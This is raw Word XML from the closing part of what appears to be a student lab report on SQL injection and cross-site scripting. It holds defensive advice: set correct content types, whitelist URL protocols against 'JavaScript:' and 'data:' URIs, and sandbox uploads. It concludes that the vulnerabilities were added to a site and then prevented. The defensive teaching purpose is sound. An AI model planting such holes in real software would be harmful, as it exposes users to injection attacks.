        <w:spacing w:after="127" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA1B13" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specify the correct Content-Type and charset for all responses that can contain user data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD5F6C" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="55"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Without such headers, many browsers will try to automatically determine the appropriate response by performing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00007E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00007E"/>
          <w:u w:val="single" w:color="00007E"/>
        </w:rPr>
        <w:t>content or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00007E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00007E"/>
          <w:u w:val="single" w:color="00007E"/>
        </w:rPr>
        <w:t>character set sniffing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This may allow external input to fool the browser into interpreting part of the response as HTML markup, which in turn can lead to XSS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A2A2EE" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="12" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1531" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A513F21" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="36" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Make sure all user-supplied URLs start with a safe protocol. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EFB772" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="77"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It's often necessary to use URLs provided by users, for example as a continue URL to redirect after a certain action, or in a link to a userspecified resource. If the protocol of the URL is controlled by the user, the browser can interpret it as a scripting URI (e.g. JavaScript:, data:, and others) and execute it. To prevent this, always verify that the URL begins with a whitelisted value (usually only http:// or https://). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D5DD2" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host user-uploaded files in a sandboxed domain. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF6D63" w14:textId="33FEDF6D" w:rsidR="00842E6C" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B63536">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="732A3EC7" wp14:editId="30ED0B57">
            <wp:extent cx="5578877" cy="3842239"/>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4237" cy="3845930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE28FF" w14:textId="0DF774A1" w:rsidR="00B63536" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3655E6AB" w14:textId="30B2A0D4" w:rsidR="00842E6C" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B63536">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25B524B8" wp14:editId="0F7061D7">
            <wp:extent cx="5604409" cy="385982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6293" cy="3861121"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD0B8DC" w14:textId="77777777" w:rsidR="00B63536" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187F016F" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="157" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="233" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>CONCLUSION:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B66C947" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Successfully added SQL Injection and Cross Site Scripting to our website pages and also prevented it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11448D5A" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="142" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00842E6C">
      <w:headerReference w:type="even" r:id="rId16"/>
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="even" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19"/>
      <w:headerReference w:type="first" r:id="rId20"/>
      <w:footerReference w:type="first" r:id="rId21"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1210" w:right="1062" w:bottom="1700" w:left="1303" w:header="1183" w:footer="1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0A0A" w14:textId="77777777" w:rsidR="00AA1442" w:rsidRDefault="00AA1442">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54E99DDC" w14:textId="77777777" w:rsidR="00AA1442" w:rsidRDefault="00AA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3778" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1303" w:right="1084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F25ACC6" wp14:editId="0361F7BB">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9941052</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="6115" name="Group 6115"/>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6506" name="Shape 6506"/>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7" name="Shape 6507"/>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5" style="width:548.88pt;height:0.47998pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:782.76pt;" coordsize="69707,60">
              <v:shape id="Shape 6508" style="position:absolute;width:69646;height:91;left:0;top:0;" coordsize="6964681,9144" path="m0,0l6964681,0l6964681,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6509"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091D" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1303" w:right="1084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0698591" wp14:editId="4B35F433">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9941052</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="6098" name="Group 6098"/>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6502" name="Shape 6502"/>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3" name="Shape 6503"/>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98" style="width:548.88pt;height:0.47998pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:782.76pt;" coordsize="69707,60">
              <v:shape id="Shape 6504" style="position:absolute;width:69646;height:91;left:0;top:0;" coordsize="6964681,9144" path="m0,0l6964681,0l6964681,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6505"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326C1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1303" w:right="1084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31AE3A1" wp14:editId="699B8A80">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9941052</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="6081" name="Group 6081"/>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6498" name="Shape 6498"/>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9" name="Shape 6499"/>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81" style="width:548.88pt;height:0.47998pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:782.76pt;" coordsize="69707,60">
              <v:shape id="Shape 6500" style="position:absolute;width:69646;height:91;left:0;top:0;" coordsize="6964681,9144" path="m0,0l6964681,0l6964681,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6501"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09C33" w14:textId="77777777" w:rsidR="00AA1442" w:rsidRDefault="00AA1442">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65C5E471" w14:textId="77777777" w:rsidR="00AA1442" w:rsidRDefault="00AA1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5100" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1303" w:right="1084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EC2C66F" wp14:editId="21435C9A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>751332</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="6105" name="Group 6105"/>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6490" name="Shape 6490"/>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1" name="Shape 6491"/>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05" style="width:548.88pt;height:0.480003pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:59.16pt;" coordsize="69707,60">
              <v:shape id="Shape 6492" style="position:absolute;width:69646;height:91;left:0;top:0;" coordsize="6964681,9144" path="m0,0l6964681,0l6964681,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6493"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p>
  <w:p w14:paraId="28AF3349" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BE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0445657" wp14:editId="48B10BA4">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>757428</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="9183624"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="6108" name="Group 6108"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6970776" cy="9183624"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6970776" cy="9183624"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="6494" name="Shape 6494"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="9144" cy="9183624"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="9144" h="9183624">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="9144" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9144" y="9183624"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9183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5" name="Shape 6495"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6964681" y="0"/>
                          <a:ext cx="9144" cy="9183624"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="9144" h="9183624">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="9144" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9144" y="9183624"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9183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08" style="width:548.88pt;height:723.12pt;position:absolute;z-index:-2147483648;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:59.64pt;" coordsize="69707,91836">
              <v:shape id="Shape 6496" style="position:absolute;width:91;height:91836;left:0;top:0;" coordsize="9144,9183624" path="m0,0l9144,0l9144,9183624l0,9183624l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6497" style="position:absolute;width:91;height:91836;left:69646;top:0;" coordsize="9144,9183624" path="m0,0l9144,0l9144,9183624l0,91836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EF138" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1303" w:right="1084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B1869B8" wp14:editId="029C9B34">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>751332</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="6088" name="Group 6088"/>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6482" name="Shape 6482"/>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3" name="Shape 6483"/>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88" style="width:548.88pt;height:0.480003pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:59.16pt;" coordsize="69707,60">
              <v:shape id="Shape 6484" style="position:absolute;width:69646;height:91;left:0;top:0;" coordsize="6964681,9144" path="m0,0l6964681,0l6964681,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6485"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p>
  <w:p w14:paraId="2B58D0E1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BE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CFAC7D2" wp14:editId="4BD0AA64">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>757428</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="9183624"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="6091" name="Group 6091"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6970776" cy="9183624"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6970776" cy="9183624"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="6486" name="Shape 6486"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="9144" cy="9183624"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="9144" h="9183624">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="9144" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9144" y="9183624"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9183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7" name="Shape 6487"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6964681" y="0"/>
                          <a:ext cx="9144" cy="9183624"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="9144" h="9183624">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="9144" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9144" y="9183624"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9183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91" style="width:548.88pt;height:723.12pt;position:absolute;z-index:-2147483648;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:59.64pt;" coordsize="69707,91836">
              <v:shape id="Shape 6488" style="position:absolute;width:91;height:91836;left:0;top:0;" coordsize="9144,9183624" path="m0,0l9144,0l9144,9183624l0,9183624l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6489" style="position:absolute;width:91;height:91836;left:69646;top:0;" coordsize="9144,9183624" path="m0,0l9144,0l9144,9183624l0,91836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91B94" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1303" w:right="1084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FE63146" wp14:editId="6CFD4815">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>751332</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="6071" name="Group 6071"/>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6474" name="Shape 6474"/>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5" name="Shape 6475"/>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71" style="width:548.88pt;height:0.480003pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:59.16pt;" coordsize="69707,60">
              <v:shape id="Shape 6476" style="position:absolute;width:69646;height:91;left:0;top:0;" coordsize="6964681,9144" path="m0,0l6964681,0l6964681,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6477"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p>
  <w:p w14:paraId="3613AF6B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BE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BC33EFF" wp14:editId="1C548FBC">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>297180</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>757428</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6970776" cy="9183624"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="6074" name="Group 6074"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6970776" cy="9183624"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6970776" cy="9183624"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="6478" name="Shape 6478"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="9144" cy="9183624"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="9144" h="9183624">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="9144" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9144" y="9183624"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9183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9" name="Shape 6479"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6964681" y="0"/>
                          <a:ext cx="9144" cy="9183624"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="9144" h="9183624">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="9144" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9144" y="9183624"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9183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74" style="width:548.88pt;height:723.12pt;position:absolute;z-index:-2147483648;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:23.4pt;mso-position-vertical-relative:page;margin-top:59.64pt;" coordsize="69707,91836">
              <v:shape id="Shape 6480" style="position:absolute;width:91;height:91836;left:0;top:0;" coordsize="9144,9183624" path="m0,0l9144,0l9144,9183624l0,9183624l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 6481" style="position:absolute;width:91;height:91836;left:69646;top:0;" coordsize="9144,9183624" path="m0,0l9144,0l9144,9183624l0,91836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6CDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3C09A68"/>
    <w:lvl w:ilvl="0" w:tplc="0A2A62F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8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F3EF4F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="19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D8A8E66">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="26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0D61ED6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="33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BA61E0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="41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CC4F858">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="48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AC5634">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="55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452B6AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="62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AB6390A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="69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8FA1B30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76A4F39A"/>
    <w:lvl w:ilvl="0" w:tplc="225A294E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="93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1CBA71CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="166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E28EDF24">
